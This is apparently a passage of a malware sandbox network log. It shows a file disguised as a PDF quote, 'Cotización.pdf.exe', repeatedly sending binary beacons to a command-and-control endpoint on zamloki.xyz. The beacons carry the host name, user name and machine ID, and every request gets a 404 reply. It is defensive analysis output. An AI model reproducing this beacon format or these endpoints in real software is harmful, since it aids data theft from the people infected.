                                    Jul 21, 2021 17:02:23.945388079 CEST5574OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:24.259855032 CEST5575INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:24 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gQk4fQnfkXx6URy5O09nFuSFrfzyH%2FWCupw4nwGLk%2B6srXTcpwobki%2BpYfaLdqPPOuFbSoNplWtCzgRIhDE9kV2alqU0IgWs7miWR6JgvY4lvw9B6kvLkfCmla4o7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f5f9cddc272-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    61192.168.2.349798104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:24.558290958 CEST5576OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:24.576527119 CEST5576OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:24.869791031 CEST5577INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:24 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OMiXrCRCdEzLKGAnM6cqMhqRsnSfBRehcNMBeKYiBzbksxE26D3ZFkPLGLh1JfmoSGe58MQTc7%2BE3X3uYEIXsmj4i%2BJoUDNlUI80WSuGIINUEoN9nghtGfWOvVWAjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f639f2d4d8a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    62192.168.2.349799104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:25.091660023 CEST5578OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:25.111491919 CEST5578OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:25.365453005 CEST5579INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:25 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xuwbtfL%2B6YoqE2L0apkV0efWyJFcjuV4PQE%2BOVDxRbcXLtPr7Yo2MgffRV5GGBtwy1HaRMnfgxmohW6WPdOQsWqib%2Ft7002IWkU6QtlibcEuTXI4kSUjXNKgLRhGzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f66eaa0dfdb-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    63192.168.2.349800172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:25.575840950 CEST5580OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:25.593796968 CEST5580OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:25.836390972 CEST5581INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:25 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C9Bfs8mU3WtQr9RtG11CT9coAvVpHPOmuzNdtaAJwT7E0Ges8fZiW4QC8648OPKbVBzImB5j%2FAMfII2G4zpTH4gCthC3z%2F4sRysM9Akc4RWA1dqM29oyYhgUMEhQqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f69e8b94e61-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    64192.168.2.349801104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:26.075061083 CEST5581OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:26.095393896 CEST5582OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:26.424388885 CEST5582INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nop65%2FXLUZ%2BIXbA7Yo%2BGmS9XujbsfjexHRGjZm7Tvf%2BIh8tqza%2BYy9%2FnzboxhKV5bc67nlAdp%2Fx%2FDhA2sgYm9PdrIbVUEnsLRPK%2FYwrck3V%2FeP9tyKhcpkURW9TlRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f6d0c201f25-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    65192.168.2.349802172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:26.650095940 CEST5583OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:26.669073105 CEST5584OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:26.932097912 CEST5584INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oGfy%2F0%2FKNRzL1tv0sse2iHXUyOw8w1%2F60wleB2Ip6ZHxRWKEOJUxk7Hqsy4XAjuErHqhTX4fwYos2ksHusprEjNzpz5KMNFmd39QKEfrY%2FR66Vw8Iu04ys%2FJcAEBKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f70ae2b4dc4-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    66192.168.2.349803172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:27.149858952 CEST5585OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:27.169967890 CEST5585OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:27.412652969 CEST5586INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W7k9xDjuOxWBRPIbZ5VlVwQNEe09rWF483MXBQJSUChcLNOWg7ZLEhHk31aNuzjLfywTjs5gC2Gp5z3HlggRpgmOzeo76z1hpAObA8XIAdEYv5SvkYPNAUDNEaXEQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f73c8b42bad-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    67192.168.2.349804104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:27.624311924 CEST5587OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:27.642754078 CEST5587OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:27.912374973 CEST5588INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lzZKHY1RzQKichI%2FGgCR5tOOcZ2LEUXgRczY%2Byk80sazesPu9xEGKYcF1zqab5ScxOyEVm%2BXovRqJFDW0mHdsWO9g2u8rCBFYkVd8XVxlcSU4YpC3YjK3acAG%2BBsBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f76be5d2c0d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    68192.168.2.349805104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:28.139415979 CEST5589OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:28.159077883 CEST5589OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:28.404659033 CEST5590INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=a%2BHufeUyQcTT6oTTKZVHGayb97QnnabOdBzqm8GeYSWc3S7%2BrJ5MFzHx6%2FIqBfSxbUj93gaYviaGtynOhUr3XxRiHx0VDuleCJStAhC7IM0cTGmaKqDN56AHBJruWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f79fc2c0eab-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    69192.168.2.349806172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:28.618675947 CEST5591OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:28.636725903 CEST5591OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:28.917639971 CEST5592INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pr2SKeSi8EMzu%2FcUgOJ8vTXiySKAV8j2oEXJYko7qNOI9Tb3WNBP%2FHGjW%2BG9BAFaZ2VBES3jROa5g0SRmqZqzPQ5sQHsA3nZ4j3RdR97zlCLcjKkbywiVX7lsV2qXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f7ceac02c56-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    7192.168.2.349735104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:51.903791904 CEST1290OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:51.944639921 CEST1290OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:52.207218885 CEST1291INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7pbbOfsTlpiI36UAMaqM%2Fas%2B3TMzg8bYEDTwgYTiKYRgIzQCvAACuho8but9fD7NLNiTwWFc9wH8TJ0rP%2BTulw1TIWdIzvPzOUXJb59GYgKXowvEE8%2FA2IQ1VbLOZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e977d5d2c56-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    70192.168.2.349807172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:29.123699903 CEST5593OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:29.143817902 CEST5593OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:29.390497923 CEST5594INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xYhNciULP6QX87xZ3fcr%2FVYKRR85yE3YPmrQZtJIkVS2CRoA7VbZ%2BqBZQUGSaXMziZzHwspsKhZM%2BchI8F%2FOjXydGJVU2AkoDIY0wKq1pbJFLD7yZFOFgcIB9QKhUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f801e69bedd-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    71192.168.2.349808172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:29.594770908 CEST5595OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:29.614578962 CEST5595OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:29.994438887 CEST5596INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0sYEejlNHebXYFchwJWFBKxQ%2FDaLUbln0rD381mfu8I0DsT74BdSsqfBS5KwMjWf%2BLPUcTiyWGxrLyGHY5OhYZWBGOXfTEidJ19H5FDTVBa%2B7x57yvbhidtlOKY7GQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f8308fcdfcb-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    72192.168.2.349809104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:30.220813990 CEST5596OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:30.239654064 CEST5597OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:30.493889093 CEST5597INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:30 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hPTz1K7ZEGMMtTOrJmfDeEAoDslOjIFESM50Kih4BPOlO7LgIIUrmFrXcWhRbFkMatGssW7%2B0PIsiv9PHS%2FYu8QEDhRyst6UeaKLpZd2TV5jAVNecoEkTw%2FRKo37hA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f86fb9ad6ed-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


